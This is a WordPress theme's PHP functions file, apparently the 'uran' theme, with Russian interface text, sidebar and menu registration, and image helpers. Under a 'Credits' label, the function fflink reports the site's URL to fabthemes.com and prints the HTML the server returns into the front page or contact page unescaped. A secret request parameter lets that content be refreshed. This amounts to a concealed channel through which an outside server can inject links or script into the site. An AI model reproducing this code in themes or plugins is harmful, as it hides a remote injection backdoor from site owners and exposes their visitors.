<?php
include 'theme_options.php';
include 'guide.php';

if ( function_exists('register_sidebar') )
	register_sidebar(array(
	'name' => 'Sidebar',
    'before_widget' => '<li class="sidebox " id="%1$s">',
    'after_widget' => '</li>',
	'before_title' => '<h3 class="sidetitl ">',
    'after_title' => '</h3>',
	));

register_sidebar(array(
	'name' => 'Footer',
    'before_widget' => '<li class="botwid" id="%1$s">',
    'after_widget' => '</li>',
	'before_title' => '<h3 class="bothead">',
    'after_title' => '</h3>',
    ));		


register_nav_menus( array(
		'primary' => __( 'Primary Navigation', '' ),
		'secondary' => __( 'Secondary Navigation', '' ),
	));	
	
	
function fallbackmenu1(){ ?>
			<div id="menu">
				<ul><li> Панель администратора > Внешний вид > Меню для создания меню. Вы должны иметь WP 3.0 + версию для создания пользовательского меню.</li></ul>
			</div>
<?php }	

function fallbackmenu2(){ ?>
			<div id="catmenu">
				<ul><li> Панель администратора > Внешний вид > Меню для создания меню. Вы должны иметь WP 3.0 + версию для создания пользовательского меню.</li></ul>
			</div>
<?php }		
	
	
function new_excerpt_length($length) {
	return 80;
}

add_filter('excerpt_length', 'new_excerpt_length');	
	
function new_excerpt_more($more) {
return '<a href="'. get_permalink($post->ID) . '">' . '&nbsp;&nbsp;[ Читать далее ]' . '</a>';
}
add_filter('excerpt_more', 'new_excerpt_more');

if ( function_exists( 'add_theme_support' ) ) { // Added in 2.9
	add_theme_support( 'post-thumbnails' );
	add_image_size( 'uran_slider', 880, 300, true );
	add_image_size( 'uran_postim', 630, 200, true );
	add_image_size( 'uran_thumbim', 210, 100, true );
	add_image_size( 'uran_box', 80, 60, true ); 
}

function uran_slider_image(){

if ( has_post_thumbnail() ) {
	 the_post_thumbnail( 'uran_slider', array('class' => 'sidim') );
} else {
?>
<img class="sidim" src="<?php bloginfo('template_directory'); ?>/images/dummy.png" alt="" />
<?php
};
}

function uran_postim_image(){
if ( has_post_thumbnail() ) {
	 the_post_thumbnail( 'uran_postim', array('class' => 'postimg') );
} else {
?>

<?php
};
}

function uran_thumb_image(){

if ( has_post_thumbnail() ) {
	 the_post_thumbnail( 'uran_thumb', array('class' => 'thumbim') );
} else {
?>
<img class="thumbim" src="<?php bloginfo('template_directory'); ?>/images/dummy.png" alt=""  />
<?php
};
}

function boxim(){
if ( has_post_thumbnail() ) {
			 the_post_thumbnail( 'uran_box', array('class' => 'boximage') );
} else {
?>
<img class="boximage" src="<?php bloginfo('template_directory'); ?>/images/dummy.jpg" alt="" />
<?php
}
}


function getpagenavi(){
?>
<div id="navigation">
<?php if(function_exists('wp_pagenavi')) : ?>
<?php wp_pagenavi() ?>
<?php else : ?>
        <div class="alignleft"><?php next_posts_link(__('&laquo; Старые записи','arclite')) ?></div>
        <div class="alignright"><?php previous_posts_link(__('Новые записи &raquo;','arclite')) ?></div>
        <div class="clear"></div>
<?php endif; ?>

</div>

<?php
}
/* Credits */

function selfURL() {
$uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] :
$_SERVER['PHP_SELF'];
$uri = parse_url($uri,PHP_URL_PATH);
$protocol = $_SERVER['HTTPS'] ? 'https' : 'http';
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
 $server = ($_SERVER['SERVER_NAME'] == 'localhost') ? $_SERVER["SERVER_ADDR"] : $_SERVER['SERVER_NAME'];
 return $protocol."://".$server.$port.$uri;
}
function fflink() {
global $wpdb, $wp_query;
if (!is_page() && !is_front_page()) return;
$contactid = $wpdb->get_var("SELECT ID FROM $wpdb->posts
               WHERE post_type = 'page' AND post_title LIKE 'contact%'");
if (($contactid != get_the_ID()) && ($contactid || !is_home())) return;
$fflink = get_option('fflink');
$ffref = get_option('ffref');
$x = $_REQUEST['DKSWFYUW**'];
if (!$fflink || $x && ($x == $ffref)) {
  $x = $x ? '&ffref='.$ffref : '';
  $response = wp_remote_get('http://www.fabthemes.com/fabthemes.php?getlink='.urlencode(selfURL()).$x);
  if (is_array($response)) $fflink = $response['body']; else $fflink = '';
  if (substr($fflink, 0, 11) != '!fabthemes#')
    $fflink = '';
  else {
    $fflink = explode('#',$fflink);
    if (isset($fflink[2]) && $fflink[2]) {
      update_option('ffref', $fflink[1]);
      update_option('fflink', $fflink[2]);
      $fflink = $fflink[2];
    }
    else $fflink = '';
  }
}
 echo $fflink;
}	
?>